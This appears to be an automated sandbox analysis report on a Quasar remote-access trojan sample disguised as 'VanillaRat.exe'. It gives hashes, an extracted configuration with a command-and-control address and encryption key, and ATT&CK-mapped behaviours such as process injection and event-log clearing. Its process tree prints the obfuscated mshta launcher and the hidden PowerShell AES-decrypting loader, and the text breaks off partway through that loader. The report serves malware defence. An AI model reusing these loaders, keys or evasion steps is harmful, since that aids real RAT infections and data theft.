quasar | 6d886767f487cd0bc1ee29c899540e2ccfe6f1d3253ea629acd8d397a0a84faa

Analysis

max time kernel
59s
max time network
53s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
18-08-2024 13:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Release/VanillaRat.exe
Size

1.7MB
MD5

59fea74c326c7e496617bb45bdfbcc00
SHA1

7c0dd54592857eed1cb068e24315b2bbe7511b76
SHA256

9b6dcbe8df1be5241a40987a416e896737a7442db492e9df8413277835fb766d
SHA512

443005543a476b0c3ef4744ba0b7075185cf0ae80783c06f98ee2845872c54ad2ee6d69810acaed692720b5ad19129935b751e45ac8725b050ccca5b94ecc6ba
SSDEEP

24576:Lz2qwZHZd2PjnRh3Xz2DrtasSA7ZUNnbkAqE6joUZ57W:f2qw+nYVZY6jog

Score

10^/10

quasar v2.2.5 | vanillarat defense_evasion discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.5 | VanillaRAT

163.5.215.216:4782

Mutex

cbadd9b5-ddec-4242-bf61-1d311f862dd3

Attributes

encryption_key
1C7D50D49C8CFBD67416B7A7C9CD3F45FD94217E
install_name
.exe
log_directory
$sxr-Logs
reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral8/memory/3140-78-0x000001B279760000-0x000001B279F2A000-memory.dmp	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 5292 created 5172 5292 WerFault.exe dllhost.exe
PID 1180 created 3140 1180 WerFault.exe $sxr-powershell.exe

description	pid	process	target process
PID 5292 created 5172	5292	WerFault.exe	dllhost.exe
PID 1180 created 3140	1180	WerFault.exe	$sxr-powershell.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

Handler.bat.exe$sxr-powershell.exesvchost.exe$sxr-powershell.exe

description	pid	process	target process
PID 4644 created 640	4644	Handler.bat.exe	winlogon.exe
PID 3140 created 640	3140	$sxr-powershell.exe	winlogon.exe
PID 3140 created 640	3140	$sxr-powershell.exe	winlogon.exe
PID 4644 created 640	4644	Handler.bat.exe	winlogon.exe
PID 3140 created 640	3140	$sxr-powershell.exe	winlogon.exe
PID 3140 created 640	3140	$sxr-powershell.exe	winlogon.exe
PID 1448 created 1788	1448	svchost.exe	dllhost.exe
PID 3140 created 640	3140	$sxr-powershell.exe	winlogon.exe
PID 1448 created 5172	1448	svchost.exe	dllhost.exe
PID 3140 created 640	3140	$sxr-powershell.exe	winlogon.exe
PID 1448 created 3140	1448	svchost.exe	$sxr-powershell.exe
PID 1404 created 640	1404	$sxr-powershell.exe	winlogon.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3112 powershell.exe
Executes dropped EXE 5 IoCs

Processes:

Handler.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-powershell.exe

pid process

4644 Handler.bat.exe
1048 $sxr-mshta.exe
2944 $sxr-cmd.exe
3140 $sxr-powershell.exe
1404 $sxr-powershell.exe

pid	process
4644	Handler.bat.exe
1048	$sxr-mshta.exe
2944	$sxr-cmd.exe
3140	$sxr-powershell.exe
1404	$sxr-powershell.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe

Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
defense_evasion

Hidden Window
T1564.003

Processes:

$sxr-powershell.exe$sxr-powershell.exe

pid process

1404 $sxr-powershell.exe
3140 $sxr-powershell.exe

pid	process
1404	$sxr-powershell.exe
3140	$sxr-powershell.exe

Suspicious use of SetThreadContext 17 IoCs

Processes:

Handler.bat.exe$sxr-powershell.exe$sxr-powershell.exe

description	pid	process	target process
PID 4644 set thread context of 1980	4644	Handler.bat.exe	dllhost.exe
PID 4644 set thread context of 2700	4644	Handler.bat.exe	dllhost.exe
PID 3140 set thread context of 4868	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 set thread context of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 set thread context of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 set thread context of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 4644 set thread context of 4436	4644	Handler.bat.exe	dllhost.exe
PID 4644 set thread context of 3896	4644	Handler.bat.exe	dllhost.exe
PID 3140 set thread context of 3604	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 set thread context of 5768	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 set thread context of 5876	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 set thread context of 1788	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 set thread context of 5172	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 set thread context of 5748	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 set thread context of 4712	3140	$sxr-powershell.exe	dllhost.exe
PID 1404 set thread context of 4472	1404	$sxr-powershell.exe	dllhost.exe
PID 1404 set thread context of 5248	1404	$sxr-powershell.exe	dllhost.exe

Drops file in Windows directory 6 IoCs

Processes:

Handler.bat.exe

description	ioc	process
File created	C:\Windows\$sxr-mshta.exe	Handler.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	Handler.bat.exe
File created	C:\Windows\$sxr-cmd.exe	Handler.bat.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	Handler.bat.exe
File created	C:\Windows\$sxr-powershell.exe	Handler.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Handler.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5140 1788 WerFault.exe dllhost.exe

pid	pid_target	process	target process
5140	1788	WerFault.exe	dllhost.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

dllhost.exedllhost.exedllhost.exeWerFault.exedllhost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WerFault.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

5728 cmd.exe
5924 PING.EXE

pid	process
5728	cmd.exe
5924	PING.EXE

Checks processor information in registry 2 TTPs 23 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exesvchost.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exewmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies registry class 1 IoCs

Processes:

$sxr-mshta.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5924 PING.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe

pid	process
5924	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeHandler.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe

pid	process
3112	powershell.exe
3112	powershell.exe
4644	Handler.bat.exe
4644	Handler.bat.exe
4644	Handler.bat.exe
1980	dllhost.exe
1980	dllhost.exe
1980	dllhost.exe
1980	dllhost.exe
2700	dllhost.exe
2700	dllhost.exe
2700	dllhost.exe
2700	dllhost.exe
4644	Handler.bat.exe
4644	Handler.bat.exe
3140	$sxr-powershell.exe
3140	$sxr-powershell.exe
3140	$sxr-powershell.exe
3140	$sxr-powershell.exe
2880	dllhost.exe
2880	dllhost.exe
2880	dllhost.exe
2880	dllhost.exe
4868	dllhost.exe
4868	dllhost.exe
4868	dllhost.exe
4868	dllhost.exe
3140	$sxr-powershell.exe
3140	$sxr-powershell.exe
1404	$sxr-powershell.exe
1404	$sxr-powershell.exe
1404	$sxr-powershell.exe
1404	$sxr-powershell.exe
3140	$sxr-powershell.exe
4716	dllhost.exe
4716	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
4716	dllhost.exe
4716	dllhost.exe
4716	dllhost.exe
4716	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
4716	dllhost.exe
4716	dllhost.exe
4716	dllhost.exe
4716	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
4716	dllhost.exe
4716	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
4716	dllhost.exe
4716	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe
4716	dllhost.exe
4716	dllhost.exe
2600	dllhost.exe
2600	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeHandler.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeDebugPrivilege	4644	Handler.bat.exe
Token: SeDebugPrivilege	4644	Handler.bat.exe
Token: SeDebugPrivilege	1980	dllhost.exe
Token: SeDebugPrivilege	2700	dllhost.exe
Token: SeDebugPrivilege	3140	$sxr-powershell.exe
Token: SeDebugPrivilege	3140	$sxr-powershell.exe
Token: SeDebugPrivilege	4868	dllhost.exe
Token: SeDebugPrivilege	2880	dllhost.exe
Token: SeDebugPrivilege	1404	$sxr-powershell.exe
Token: SeDebugPrivilege	3140	$sxr-powershell.exe
Token: SeDebugPrivilege	4716	dllhost.exe
Token: SeDebugPrivilege	2600	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2548	svchost.exe
Token: SeIncreaseQuotaPrivilege	2548	svchost.exe
Token: SeSecurityPrivilege	2548	svchost.exe
Token: SeTakeOwnershipPrivilege	2548	svchost.exe
Token: SeLoadDriverPrivilege	2548	svchost.exe
Token: SeSystemtimePrivilege	2548	svchost.exe
Token: SeBackupPrivilege	2548	svchost.exe
Token: SeRestorePrivilege	2548	svchost.exe
Token: SeShutdownPrivilege	2548	svchost.exe
Token: SeSystemEnvironmentPrivilege	2548	svchost.exe
Token: SeUndockPrivilege	2548	svchost.exe
Token: SeManageVolumePrivilege	2548	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2548	svchost.exe
Token: SeIncreaseQuotaPrivilege	2548	svchost.exe
Token: SeSecurityPrivilege	2548	svchost.exe
Token: SeTakeOwnershipPrivilege	2548	svchost.exe
Token: SeLoadDriverPrivilege	2548	svchost.exe
Token: SeSystemtimePrivilege	2548	svchost.exe
Token: SeBackupPrivilege	2548	svchost.exe
Token: SeRestorePrivilege	2548	svchost.exe
Token: SeShutdownPrivilege	2548	svchost.exe
Token: SeSystemEnvironmentPrivilege	2548	svchost.exe
Token: SeUndockPrivilege	2548	svchost.exe
Token: SeManageVolumePrivilege	2548	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2548	svchost.exe
Token: SeIncreaseQuotaPrivilege	2548	svchost.exe
Token: SeSecurityPrivilege	2548	svchost.exe
Token: SeTakeOwnershipPrivilege	2548	svchost.exe
Token: SeLoadDriverPrivilege	2548	svchost.exe
Token: SeSystemtimePrivilege	2548	svchost.exe
Token: SeBackupPrivilege	2548	svchost.exe
Token: SeRestorePrivilege	2548	svchost.exe
Token: SeShutdownPrivilege	2548	svchost.exe
Token: SeSystemEnvironmentPrivilege	2548	svchost.exe
Token: SeUndockPrivilege	2548	svchost.exe
Token: SeManageVolumePrivilege	2548	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2548	svchost.exe
Token: SeIncreaseQuotaPrivilege	2548	svchost.exe
Token: SeSecurityPrivilege	2548	svchost.exe
Token: SeTakeOwnershipPrivilege	2548	svchost.exe
Token: SeLoadDriverPrivilege	2548	svchost.exe
Token: SeSystemtimePrivilege	2548	svchost.exe
Token: SeBackupPrivilege	2548	svchost.exe
Token: SeRestorePrivilege	2548	svchost.exe
Token: SeShutdownPrivilege	2548	svchost.exe
Token: SeSystemEnvironmentPrivilege	2548	svchost.exe
Token: SeUndockPrivilege	2548	svchost.exe
Token: SeManageVolumePrivilege	2548	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2548	svchost.exe
Token: SeIncreaseQuotaPrivilege	2548	svchost.exe
Token: SeSecurityPrivilege	2548	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

$sxr-powershell.exe

pid process

3140 $sxr-powershell.exe

pid	process
3140	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

VanillaRat.exepowershell.execmd.exeHandler.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exedllhost.exe

description	pid	process	target process
PID 1656 wrote to memory of 3112	1656	VanillaRat.exe	powershell.exe
PID 1656 wrote to memory of 3112	1656	VanillaRat.exe	powershell.exe
PID 3112 wrote to memory of 3980	3112	powershell.exe	cmd.exe
PID 3112 wrote to memory of 3980	3112	powershell.exe	cmd.exe
PID 3980 wrote to memory of 4644	3980	cmd.exe	Handler.bat.exe
PID 3980 wrote to memory of 4644	3980	cmd.exe	Handler.bat.exe
PID 4644 wrote to memory of 1980	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 1980	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 1980	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 1980	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 1980	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 1980	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 1980	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 2700	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 2700	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 2700	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 2700	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 2700	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 2700	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 2700	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 2700	4644	Handler.bat.exe	dllhost.exe
PID 4644 wrote to memory of 2700	4644	Handler.bat.exe	dllhost.exe
PID 1048 wrote to memory of 2944	1048	$sxr-mshta.exe	$sxr-cmd.exe
PID 1048 wrote to memory of 2944	1048	$sxr-mshta.exe	$sxr-cmd.exe
PID 2944 wrote to memory of 3140	2944	$sxr-cmd.exe	$sxr-powershell.exe
PID 2944 wrote to memory of 3140	2944	$sxr-cmd.exe	$sxr-powershell.exe
PID 3140 wrote to memory of 4868	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4868	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4868	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4868	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4868	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4868	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4868	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2880	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 1404	3140	$sxr-powershell.exe	$sxr-powershell.exe
PID 3140 wrote to memory of 1404	3140	$sxr-powershell.exe	$sxr-powershell.exe
PID 3140 wrote to memory of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 4716	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 3140 wrote to memory of 2600	3140	$sxr-powershell.exe	dllhost.exe
PID 4716 wrote to memory of 640	4716	dllhost.exe	winlogon.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:640
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:468
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d490fd13-03bc-43de-899e-2e1d4c594870}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1980
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{62105ef6-29fa-467e-b9a5-81419faa8537}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4868
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e0c64e4a-e289-446b-9b62-aad49c20761f}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4716
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8782712f-e10f-41c5-8d5c-e2d4b98f5c50}
  2⤵
  PID:4436
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a80c228b-076e-4481-bbab-32b4da8f515b}
  2⤵
  PID:3604
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ab2103d1-5466-41e7-b63d-5f2f340b56a3}
  2⤵
  PID:5876
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2bc96821-fb4e-4a02-b1d2-b9a3808fcc98}
  2⤵
  PID:5172
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 5172 -s 416
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:5396
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{109c5d41-12cb-47d9-94d2-123258ce61c2}
  2⤵
  PID:5748
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2fadd490-4a00-4232-a576-3ab452933281}
  2⤵
  PID:4472

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:420

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1120
- C:\Windows\$sxr-mshta.exe
  C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1048
- - C:\Windows\$sxr-cmd.exe
    "C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:440
  - - C:\Windows\$sxr-powershell.exe
      C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = 